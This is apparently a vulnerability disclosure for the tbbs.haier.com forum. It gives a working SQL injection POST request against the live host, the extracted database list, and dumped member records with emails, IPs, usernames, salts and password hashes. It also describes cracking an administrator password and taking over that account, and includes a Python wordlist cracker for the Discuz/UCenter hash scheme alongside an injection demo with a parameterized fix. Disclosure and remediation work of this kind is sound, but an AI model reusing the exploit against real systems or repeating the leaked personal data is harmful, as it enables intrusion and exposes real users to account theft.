SQL injection, Discuz (DZ) forum
At least 20,000 records
trs_ucenter_members_bak
[8846 entries]
Table: trs_common_member
[2727 entries]
Table: uc_members
[8326 entries]
0. The target site is tbbs.haier.com. This forum is not the same forum as bbs.haier.com.
1. First a minor one: the crossdomain.xml file
http://tbbs.haier.com/crossdomain.xml
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
allow-access-from domain="*" lets a Flash/Silverlight client served from any origin make credentialed requests to this host and read the responses, so any logged-in user's data on tbbs.haier.com is readable from any third-party site.
2. Link that leaks an internal IP
http://tbbs.haier.com/HaierBBS/test.jsp
Leaked internal IP: 10.135.103.22
Management platform:
http://tbbs.haier.com/was5/web/login.jsp
3. SQL injection
Bump the level (sqlmap --level) when injecting. The injection point is the sourceId parameter in the POST body below; the type parameter is an unquoted comma-separated list that goes into the same query.
POST /HaierBBS/thrdapplycount/gettolcount.do HTTP/1.1
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
Referer: http://tbbs.haier.com/
Cookie: JSESSIONID=C508D821EE8E5CC4B133E91E9FF5D81D.jvm1; idsALUserSource=""
Host: tbbs.haier.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
sourceId=1'%22&type=1%2C5%2C6%2C7%2C8%2C9%2C10
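To show why the probe sourceId=1'" produces a detectable error and why a quote-breaking payload changes the result, here is an added example (not code from the page or from the Haier application, whose real query and schema are unknown): a constructed SQLite table standing in for the count table behind gettolcount.do, the string-concatenated query pattern that reproduces the observed behaviour, and the parameterized rewrite. The table name thrd_apply_count, its columns and the rows are assumptions.

```python
import sqlite3

# Constructed sample rows (source_id, type, cnt); the real schema is unknown.
ROWS = [
    (1, 1, 10),
    (1, 5, 7),
    (2, 1, 3),
    (3, 9, 4),
]


def make_db():
    """In-memory stand-in for the database behind gettolcount.do."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE thrd_apply_count (source_id INTEGER, type INTEGER, cnt INTEGER)"
    )
    conn.executemany("INSERT INTO thrd_apply_count VALUES (?, ?, ?)", ROWS)
    return conn


def total_count_vulnerable(conn, source_id, types):
    """Request parameters pasted straight into the SQL text (assumed pattern)."""
    sql = (
        "SELECT COALESCE(SUM(cnt), 0) FROM thrd_apply_count "
        "WHERE source_id = '%s' AND type IN (%s)" % (source_id, types)
    )
    return conn.execute(sql).fetchone()[0]


def total_count_fixed(conn, source_id, types):
    """Same query with bound parameters; the IN list is rebuilt from integers only."""
    type_list = [int(t) for t in types.split(",")]  # rejects anything but digits
    placeholders = ",".join("?" * len(type_list))
    sql = (
        "SELECT COALESCE(SUM(cnt), 0) FROM thrd_apply_count "
        "WHERE source_id = ? AND type IN (%s)" % placeholders
    )
    # source_id is bound as data: a payload is compared as a literal string and
    # never matches the integer column.
    return conn.execute(sql, [source_id] + type_list).fetchone()[0]


def probe(conn, func, source_id, types="1,5,6,7,8,9,10"):
    """Record a request the way an injection tester would: ("ok", value) or ("error", msg)."""
    try:
        return ("ok", func(conn, source_id, types))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for payload in ["1", "1'\"", "1' OR '1'='1"]:
        print(repr(payload),
              "vulnerable:", probe(db, total_count_vulnerable, payload),
              "fixed:", probe(db, total_count_fixed, payload))
```

The `1'"` probe from the request above errors out only in the concatenated version (error-based detection signal), and `1' OR '1'='1` widens the WHERE clause so the sum covers every source, which is the boolean difference sqlmap keys on; the bound version returns the normal result for the legitimate value and 0 for the payloads.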
22 databases:
[*] confluence
[*] confluence2
[*] confluence3
[*] confluence4
[*] discuz0719
[*] discuz15
[*] gitlabhq_development
[*] gitlabhq_production
[*] gitlabhq_test
[*] information_schema
[*] logbak
[*] mysql
[*] performance_schema
[*] test
[*] trswcmcluster
[*] trswcmcluster0830
[*] trswcmclustercn
[*] trswcmv65clusterforcn0410
[*] trswcmv65clusterforen
[*] trswcmv65clusterforen1025
[*] trswcmv65clusterforen20131114
[*] trswcmv65plugins
Leaks member information, including username, password hash, salt, email, phone number, etc. (row counts as listed at the top).
e.g.
back-end DBMS: MySQL 5.0
Database: discuz15
Table: uc_members
[8326 entries]
+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+
| uid | myid | myidkey | salt | babao | regip | email | secques | regdate | username | password | lastloginip | lastlogintime |
+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+
| 1 | <blank> | <blank> | 170560 | NULL | 114.245.229.254 | admin@mocard.tv | <blank> | 1259818150 | admin | e6dbb8e9474d11bd3697ba769a18f204 | 0 | 0 |
| 2 | <blank> | <blank> | 63b267 | NULL | 114.245.229.254 | kllm868@163.com | <blank> | 1259818742 | kllm868 | bd4c0638b9e9cea498aeae9684ce3112 | 0 | 0 |
| 8 | <blank> | <blank> | abff79 | NULL | 114.245.231.251 | 2507248571111@qq.com | <blank> | 1259985674 | #aqa | 7beb4aed0685006f808f51ce537ec55a | 0 | 0 |
| 10 | <blank> | <blank> | 038643 | NULL | 218.58.70.250 | wxn_summer520@163.com | <blank> | 1259992864 | \xe8??\xe9\xbb? | a2adcc48ade4bf6c24e1510aa26f0ea3 | 0 | 0 |
| 15 | <blank> | <blank> | 3ac3b3 | NULL | 210.5.133.19 | 94172070@qq.com | <blank> | 1260006611 | s520 | 5c68c562eaa0c48a54f0b587c1c8af7a | 0 | 0 |
| 16 | <blank> | <blank> | 8712f0 | NULL | 114.245.231.251 | 4698642882w2w@qq.com | <blank> | 1260009400 | 2w2w2w | b5c32024ea7e703a4ac90536dbc381a7 | 0 | 0 |
4. Arbitrary modification of UC administrator information
Through the injection, obtain the administrator record from trs_ucenter_members_admin:
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
| uid | myid | myidkey | salt | regip | email | avatar | secques | regdate | username | password | lastloginip | lastlogintime |
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
| 173356 | <blank> | <blank> | b351e0 | 10.135.103.22 | kiraqing@vip.qq.com | NULL | <blank> | 1353657771 | lhtww | 935af859a07284299ed775479542ff1f | 0 | 0 |
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
Although the password is salted, 123456 can still be cracked (the salt sits in the same row as the hash, so it only defeats precomputed tables, not a per-user wordlist run).
Log in with it and you can change the information at will: bind a phone number, change the email address, and so on.
VIP user portal
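To make the "salted but still crackable" point concrete, here is an added example (not from the page, and not UCenter's own code) implementing the Discuz/UCenter password scheme, md5(md5(password) + salt) hex-encoded, and running a small wordlist against it. The salts, hashes and usernames below are constructed in the block; nothing is asserted about the real dump, though the functions accept a (salt, hash) pair from it unchanged.

```python
import hashlib

# Constructed wordlist; a real run would use a large dictionary plus rules.
WORDLIST = ["password", "admin", "111111", "123456", "12345678", "haier2013"]


def uc_hash(password: str, salt: str) -> str:
    """Discuz/UCenter scheme: md5(md5(password) + salt), both hex-encoded."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


def crack(target_hash: str, salt: str, wordlist):
    """Return the first wordlist entry whose salted hash matches, else None.

    The per-user salt means no shared rainbow table helps, but since the salt
    is stored next to the hash it costs only one extra MD5 per guess.
    """
    target_hash = target_hash.lower()
    for candidate in wordlist:
        if uc_hash(candidate, salt) == target_hash:
            return candidate
    return None


def crack_many(rows, wordlist):
    """Process dump rows of (username, salt, password_hash) like an attacker would."""
    return {username: crack(pw_hash, salt, wordlist) for username, salt, pw_hash in rows}


# Constructed rows in the dump's layout (username, salt, password).
# user_a has the weak password the report found; user_b has one not in the list.
DEMO_ROWS = [
    ("user_a", "a1b2c3", uc_hash("123456", "a1b2c3")),
    ("user_b", "d4e5f6", uc_hash("Tr0ub4dor&3", "d4e5f6")),
]


if __name__ == "__main__":
    # md5("123456") is e10adc3949ba59abbe56e057f20f883e; the outer hash differs per salt.
    print("inner md5:", hashlib.md5(b"123456").hexdigest())
    for user, result in crack_many(DEMO_ROWS, WORDLIST).items():
        print(user, "->", result)
```

MD5 with a six-character salt gives no work factor, so every leaked row is testable at wordlist speed; a slow, memory-hard hash (bcrypt/scrypt/Argon2) is the fix on the storage side, and the report's remediation 3 (stronger passwords) is what limits damage for the rows already leaked.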
5. Brute force
http://tuser.haier.com/ids/cn/haier_login.jsp?returnUrl=http://tuser.haier.com/HaierFramework/haier/appuser/vipUser/myhaier.jsp
If the UC administrator's password is 123456, other users' passwords may well be 123456 too. Not tested.
Proof of vulnerability:
Fix:
1. Filter special characters; better, build the query in the .do handler with bound parameters (PreparedStatement) instead of string concatenation
2. Restrict access to the administration interface
3. Enforce stronger passwords (presumably)